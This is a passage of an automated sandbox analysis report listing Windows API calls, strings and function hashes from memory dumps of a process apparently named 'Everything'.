                                                                                                            • EnterCriticalSection.KERNEL32(?,00000000,00000000,00000000,00000006,00007FF63D559EEB,?,?,?,?,?,00007FF63D55B45D), ref: 00007FF63D559017
                                                                                                              • Part of subcall function 00007FF63D548B10: WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,?,?,00007FF63D559029), ref: 00007FF63D548B16
                                                                                                            • LeaveCriticalSection.KERNEL32(?,?,?,?,?,00007FF63D55B45D,?,?,?,?,?,?,00007FF63D4808B0), ref: 00007FF63D55915D
                                                                                                              • Part of subcall function 00007FF63D53F700: GetProcessHeap.KERNEL32(?,?,?,?,-0000FFFE,00007FF63D5ED8A7,?,?,?,00007FF63D47106C), ref: 00007FF63D53F709
                                                                                                              • Part of subcall function 00007FF63D53F700: HeapAlloc.KERNEL32(?,?,?,?,-0000FFFE,00007FF63D5ED8A7,?,?,?,00007FF63D47106C), ref: 00007FF63D53F717
                                                                                                            • EnterCriticalSection.KERNEL32(?,?,?,?,?,00007FF63D55B45D,?,?,?,?,?,?,00007FF63D4808B0), ref: 00007FF63D559075
                                                                                                            • LeaveCriticalSection.KERNEL32(?,?,?,?,?,00007FF63D55B45D,?,?,?,?,?,?,00007FF63D4808B0), ref: 00007FF63D5590AC
                                                                                                            • SetEvent.KERNEL32(?,?,?,?,?,00007FF63D55B45D,?,?,?,?,?,?,00007FF63D4808B0), ref: 00007FF63D5590B9
                                                                                                            • EnterCriticalSection.KERNEL32(?,?,?,?,?,00007FF63D55B45D,?,?,?,?,?,?,00007FF63D4808B0), ref: 00007FF63D5590E7
                                                                                                            • LeaveCriticalSection.KERNEL32(?,?,?,?,?,00007FF63D55B45D,?,?,?,?,?,?,00007FF63D4808B0), ref: 00007FF63D5590FC
                                                                                                            • WaitForMultipleObjects.KERNEL32(?,?,?,?,?,00007FF63D55B45D,?,?,?,?,?,?,00007FF63D4808B0), ref: 00007FF63D55912E
                                                                                                            • ResetEvent.KERNEL32(?,?,?,?,?,00007FF63D55B45D,?,?,?,?,?,?,00007FF63D4808B0), ref: 00007FF63D55913B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2243039986.00007FF63D471000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF63D470000, based on PE: true
                                                                                                            • Associated: 00000006.00000002.2242965964.00007FF63D470000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D620000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D64A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243722692.00007FF63D66C000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243801950.00007FF63D670000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243924981.00007FF63D671000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243948513.00007FF63D673000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243976774.00007FF63D674000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244000249.00007FF63D67C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244022765.00007FF63D680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_7ff63d470000_Everything.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CriticalSection$EnterLeave$EventHeapWait$AllocMultipleObjectObjectsProcessResetSingle
                                                                                                            • String ID:
                                                                                                            • API String ID: 2528264715-0
                                                                                                            • Opcode ID: 68da3135dd29450f482d0fa575148c6e094892f1e464d5564a8224311e7bdaeb
                                                                                                            • Instruction ID: 026cd6b88fd1a1543988077058e391caf3465b49bcac9ae71d5187bad66e418c
                                                                                                            • Opcode Fuzzy Hash: 68da3135dd29450f482d0fa575148c6e094892f1e464d5564a8224311e7bdaeb
                                                                                                            • Instruction Fuzzy Hash: 4C416A32B04A5AA6E7489F62E9507AAB760FB85B94F404431DFAD83760EF3CE475D700
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2243039986.00007FF63D471000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF63D470000, based on PE: true
                                                                                                            • Associated: 00000006.00000002.2242965964.00007FF63D470000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D620000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D64A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243722692.00007FF63D66C000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243801950.00007FF63D670000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243924981.00007FF63D671000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243948513.00007FF63D673000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243976774.00007FF63D674000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244000249.00007FF63D67C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244022765.00007FF63D680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_7ff63d470000_Everything.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: PerformanceQuery$CloseCountCounterErrorFrequencyHandleLastTick
                                                                                                            • String ID: _service_client_ioctrl %u, s %u r %u$_service_client_ioctrl reply %d in %f seconds$set last error %d$stop ntfs_monitor %s %u %p
                                                                                                            • API String ID: 1627814034-2541180860
                                                                                                            • Opcode ID: 71bea037a20447b6c738870ffa29fc810daf66d672fd93d7bc72d5cf47c03e3a
                                                                                                            • Instruction ID: b02dcbd3dc486274c330548f0eb9fc48a12ac65094253d544b975ab0a21d9d66
                                                                                                            • Opcode Fuzzy Hash: 71bea037a20447b6c738870ffa29fc810daf66d672fd93d7bc72d5cf47c03e3a
                                                                                                            • Instruction Fuzzy Hash: AC51A432E0854A96EB119BA5E4412793361FB487B4F044231EE2E877D5EF3CE895A740
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2243039986.00007FF63D471000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF63D470000, based on PE: true
                                                                                                            • Associated: 00000006.00000002.2242965964.00007FF63D470000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D620000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D64A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243722692.00007FF63D66C000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243801950.00007FF63D670000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243924981.00007FF63D671000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243948513.00007FF63D673000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243976774.00007FF63D674000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244000249.00007FF63D67C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244022765.00007FF63D680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_7ff63d470000_Everything.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DeviceErrorLast$NotificationRegister$CloseControlCreateFileHandle
                                                                                                            • String ID: 8$RegisterDeviceNotification %s failed! %d$update register device notify (ntfs: %d refs: %d)
                                                                                                            • API String ID: 987035032-1259707150
                                                                                                            • Opcode ID: 65ed92b6e662ca06f0a727817eab738cdb0a6348b78baa5f733ec432eb7c5514
                                                                                                            • Instruction ID: c9a7bb7de684ec0cbdbc6e1bd6399f72385d69495fbf60e3368fac5e3fa22aa4
                                                                                                            • Opcode Fuzzy Hash: 65ed92b6e662ca06f0a727817eab738cdb0a6348b78baa5f733ec432eb7c5514
                                                                                                            • Instruction Fuzzy Hash: 57515032A08B4581EB508FA4F44136D77A0FB59BA8F041339EAAD877D9EF7CD4559700
                                                                                                            APIs
                                                                                                            • FlsGetValue.KERNEL32(?,?,?,00007FF63D61DDFE,?,?,?,?,00000000,00000000,000000FF,00000000,A28000000001A38E,00007FF63D61B429), ref: 00007FF63D619F4A
                                                                                                            • GetModuleHandleA.KERNEL32(?,?,?,00007FF63D61DDFE,?,?,?,?,00000000,00000000,000000FF,00000000,A28000000001A38E,00007FF63D61B429), ref: 00007FF63D619F68
                                                                                                            • GetModuleHandleA.KERNEL32 ref: 00007FF63D619F95
                                                                                                            • GetProcAddress.KERNEL32 ref: 00007FF63D619FE8
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2243039986.00007FF63D471000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF63D470000, based on PE: true
                                                                                                            • Associated: 00000006.00000002.2242965964.00007FF63D470000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D620000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D64A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243722692.00007FF63D66C000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243801950.00007FF63D670000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243924981.00007FF63D671000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243948513.00007FF63D673000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243976774.00007FF63D674000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244000249.00007FF63D67C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244022765.00007FF63D680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_7ff63d470000_Everything.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: HandleModule$AddressProcValue
                                                                                                            • String ID: .mixcrt$EncodePointer$KERNEL32.DLL
                                                                                                            • API String ID: 2623865758-1746336069
                                                                                                            • Opcode ID: 0e738b0e9dd0fd2b30ad69a3de34deba4fc952c6c9f6e4d80ff2b342a77b8c97
                                                                                                            • Instruction ID: 0904d31221ab4085af13cfe291814ebde1b17798523fae3d7ad5847beec0866c
                                                                                                            • Opcode Fuzzy Hash: 0e738b0e9dd0fd2b30ad69a3de34deba4fc952c6c9f6e4d80ff2b342a77b8c97
                                                                                                            • Instruction Fuzzy Hash: 4D21B661F18A5A91EB948F91E84013963A1FF8AB55F485035D96EC3794FF3CE985F300
                                                                                                            APIs
                                                                                                            • FlsGetValue.KERNEL32(00000000,?,00000000,00007FF63D61DE55,?,?,?,?,00000000,00000000,000000FF,00000000,A28000000001A38E,00007FF63D61B429), ref: 00007FF63D619E80
                                                                                                            • GetModuleHandleA.KERNEL32(00000000,?,00000000,00007FF63D61DE55,?,?,?,?,00000000,00000000,000000FF,00000000,A28000000001A38E,00007FF63D61B429), ref: 00007FF63D619E9B
                                                                                                            • GetModuleHandleA.KERNEL32 ref: 00007FF63D619EC2
                                                                                                            • GetProcAddress.KERNEL32 ref: 00007FF63D619F08
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2243039986.00007FF63D471000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF63D470000, based on PE: true
                                                                                                            • Associated: 00000006.00000002.2242965964.00007FF63D470000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D620000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D64A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243722692.00007FF63D66C000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243801950.00007FF63D670000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243924981.00007FF63D671000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243948513.00007FF63D673000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243976774.00007FF63D674000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244000249.00007FF63D67C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244022765.00007FF63D680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_7ff63d470000_Everything.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: HandleModule$AddressProcValue
                                                                                                            • String ID: .mixcrt$EncodePointer$KERNEL32.DLL
                                                                                                            • API String ID: 2623865758-1746336069
                                                                                                            • Opcode ID: 6b30e754aaadaa4f8fc935d50f4e7b1d5162ebb0f6a373f04bcd312fc096837c
                                                                                                            • Instruction ID: 44c9e09b0c7871752995f133729e6dbf32511699e0b43df4793f7d5cc84b961a
                                                                                                            • Opcode Fuzzy Hash: 6b30e754aaadaa4f8fc935d50f4e7b1d5162ebb0f6a373f04bcd312fc096837c
                                                                                                            • Instruction Fuzzy Hash: 0E21C561E08A6A95EB548F91E84013823A1FF47B94F58443AD93EC2790FF3CE985F300
                                                                                                            APIs
                                                                                                            • FlsGetValue.KERNEL32(00000000,00000000,000002D8,00007FF63D61B615,?,?,000002D8,00007FF63D61DCB7,?,?,?,?,00000000,00007FF63D61AFBE), ref: 00007FF63D61A040
                                                                                                            • GetModuleHandleA.KERNEL32(00000000,00000000,000002D8,00007FF63D61B615,?,?,000002D8,00007FF63D61DCB7,?,?,?,?,00000000,00007FF63D61AFBE), ref: 00007FF63D61A05B
                                                                                                            • GetModuleHandleA.KERNEL32 ref: 00007FF63D61A082
                                                                                                            • GetProcAddress.KERNEL32 ref: 00007FF63D61A0C8
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2243039986.00007FF63D471000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF63D470000, based on PE: true
                                                                                                            • Associated: 00000006.00000002.2242965964.00007FF63D470000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D620000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D64A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243722692.00007FF63D66C000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243801950.00007FF63D670000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243924981.00007FF63D671000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243948513.00007FF63D673000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243976774.00007FF63D674000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244000249.00007FF63D67C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244022765.00007FF63D680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_7ff63d470000_Everything.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: HandleModule$AddressProcValue
                                                                                                            • String ID: .mixcrt$DecodePointer$KERNEL32.DLL
                                                                                                            • API String ID: 2623865758-2532145718
                                                                                                            • Opcode ID: dc941b6f0c9983239806b4a8bbc5e579d97c0cc3782417b6b832184af92ee80c
                                                                                                            • Instruction ID: 056f39bd31049e92320afc3063e4f59001f22491ac23a195f9a0205ca817bb4b
                                                                                                            • Opcode Fuzzy Hash: dc941b6f0c9983239806b4a8bbc5e579d97c0cc3782417b6b832184af92ee80c
                                                                                                            • Instruction Fuzzy Hash: F1219222F08A6B85EB548F91AC401782361FF46B99F584535DA2D82394FF3CE886F310
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2243039986.00007FF63D471000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF63D470000, based on PE: true
                                                                                                            • Associated: 00000006.00000002.2242965964.00007FF63D470000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D620000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D64A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243722692.00007FF63D66C000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243801950.00007FF63D670000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243924981.00007FF63D671000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243948513.00007FF63D673000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243976774.00007FF63D674000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244000249.00007FF63D67C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244022765.00007FF63D680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_7ff63d470000_Everything.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Service$CloseHandleOpen$HeapQuery$AllocConfigManagerProcessStatus
                                                                                                            • String ID:
                                                                                                            • API String ID: 4204211940-0
                                                                                                            • Opcode ID: b1922ff0c5f1df16e8ab5f3f184f67f943290c2e2d2c942c994d66d4ec61808e
                                                                                                            • Instruction ID: cd7ddedbc693e18ed9f660a4b9122b1c55edcc58c448a2ba29db6a69e2617f79
                                                                                                            • Opcode Fuzzy Hash: b1922ff0c5f1df16e8ab5f3f184f67f943290c2e2d2c942c994d66d4ec61808e
                                                                                                            • Instruction Fuzzy Hash: 07319565B19A9A95FB60DB52E8143AA6361FFC9B94F844035DE4E83B44EF3CE404E704
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2243039986.00007FF63D471000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF63D470000, based on PE: true
                                                                                                            • Associated: 00000006.00000002.2242965964.00007FF63D470000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D620000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D64A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243722692.00007FF63D66C000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243801950.00007FF63D670000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243924981.00007FF63D671000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243948513.00007FF63D673000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243976774.00007FF63D674000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244000249.00007FF63D67C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244022765.00007FF63D680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_7ff63d470000_Everything.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: PerformanceQuery$CloseCountCounterErrorFrequencyHandleLastTick
                                                                                                            • String ID: _service_client_ioctrl %u, s %u r %u$_service_client_ioctrl reply %d in %f seconds$set last error %d
                                                                                                            • API String ID: 1627814034-1087158519
                                                                                                            • Opcode ID: e55eede34c394a2b9db6b85db98efb65300f9e9190ea0b4d57156bc880c3712a
                                                                                                            • Instruction ID: 51b2f59091c135a04f762a0984d9486c9a926504a01401042737734a9a82e164
                                                                                                            • Opcode Fuzzy Hash: e55eede34c394a2b9db6b85db98efb65300f9e9190ea0b4d57156bc880c3712a
                                                                                                            • Instruction Fuzzy Hash: C341E332E0864A86EB518FA1E4412793261EF857B4F184231DE2D877C1FF3CE895A780
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2243039986.00007FF63D471000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF63D470000, based on PE: true
                                                                                                            • Associated: 00000006.00000002.2242965964.00007FF63D470000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D620000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D64A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243722692.00007FF63D66C000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243801950.00007FF63D670000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243924981.00007FF63D671000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243948513.00007FF63D673000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243976774.00007FF63D674000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244000249.00007FF63D67C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244022765.00007FF63D680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_7ff63d470000_Everything.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileRead
                                                                                                            • String ID: BZ2_bzDecompress(): %d: Failed to decompress.$BZ2_bzDecompress(): %d: Unexpected EOF in decompression stream.$ReadFile(): %d: Failed to read.
                                                                                                            • API String ID: 2738559852-2845142729
                                                                                                            • Opcode ID: e645d4e67a7ccd5d5879b26f84b48ae986d5437351dff4c12f153b87d6f83331
                                                                                                            • Instruction ID: 76436ad61d754549f37fa43631de96615b053983676fa9623454b8436d030934
                                                                                                            • Opcode Fuzzy Hash: e645d4e67a7ccd5d5879b26f84b48ae986d5437351dff4c12f153b87d6f83331
                                                                                                            • Instruction Fuzzy Hash: F3413D72A0864A97EB709BA1F08017AB3A0FB84754F154435DBEE83B95EF7CE445EB00
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2243039986.00007FF63D471000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF63D470000, based on PE: true
                                                                                                            • Associated: 00000006.00000002.2242965964.00007FF63D470000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D620000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D64A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243722692.00007FF63D66C000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243801950.00007FF63D670000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243924981.00007FF63D671000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243948513.00007FF63D673000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243976774.00007FF63D674000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244000249.00007FF63D67C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244022765.00007FF63D680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_7ff63d470000_Everything.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileRead
                                                                                                            • String ID: BZ2_bzDecompress(): %d: Failed to decompress.$BZ2_bzDecompress(): %d: Unexpected EOF in decompression stream.$ReadFile(): %d: Failed to read.
                                                                                                            • API String ID: 2738559852-2845142729
                                                                                                            • Opcode ID: 4305b596c4f63c49cc7889f398186919bdac95f911097467c332032c63805888
                                                                                                            • Instruction ID: a958dec973b359bf4d35c23e85bc52c2dc735cefb8036b8d37947cf2539c9379
                                                                                                            • Opcode Fuzzy Hash: 4305b596c4f63c49cc7889f398186919bdac95f911097467c332032c63805888
                                                                                                            • Instruction Fuzzy Hash: 07414A72A0864A97EB709BB1F04017AB3A1FB84754F154036DAEE83B95EF7CE455EB00
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2243039986.00007FF63D471000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF63D470000, based on PE: true
                                                                                                            • Associated: 00000006.00000002.2242965964.00007FF63D470000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D620000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D64A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243722692.00007FF63D66C000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243801950.00007FF63D670000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243924981.00007FF63D671000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243948513.00007FF63D673000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243976774.00007FF63D674000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244000249.00007FF63D67C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244022765.00007FF63D680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_7ff63d470000_Everything.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileRead
                                                                                                            • String ID: BZ2_bzDecompress(): %d: Failed to decompress.$BZ2_bzDecompress(): %d: Unexpected EOF in decompression stream.$ReadFile(): %d: Failed to read.
                                                                                                            • API String ID: 2738559852-2845142729
                                                                                                            • Opcode ID: dc4562cc5e01d4d15ed8a3588b8b667eadf2c83bc719e62d6b809a20c0dc0a37
                                                                                                            • Instruction ID: 82e6cfbf8d4895ab5519941fc398d8a42e11cfd1c4ad5cf2740986bfb3d2c89b
                                                                                                            • Opcode Fuzzy Hash: dc4562cc5e01d4d15ed8a3588b8b667eadf2c83bc719e62d6b809a20c0dc0a37
                                                                                                            • Instruction Fuzzy Hash: 56413D36A0868A97EB609FA1F04007AB3A4FB45794F154035DADE83B95EF7CE485E700
                                                                                                            APIs
                                                                                                            • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF63D4C17AD), ref: 00007FF63D4BDA7D
                                                                                                            • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF63D4C17AD), ref: 00007FF63D4BDA9F
                                                                                                            • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF63D4C17AD), ref: 00007FF63D4BDAD9
                                                                                                            • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF63D4C17AD), ref: 00007FF63D4BDAF1
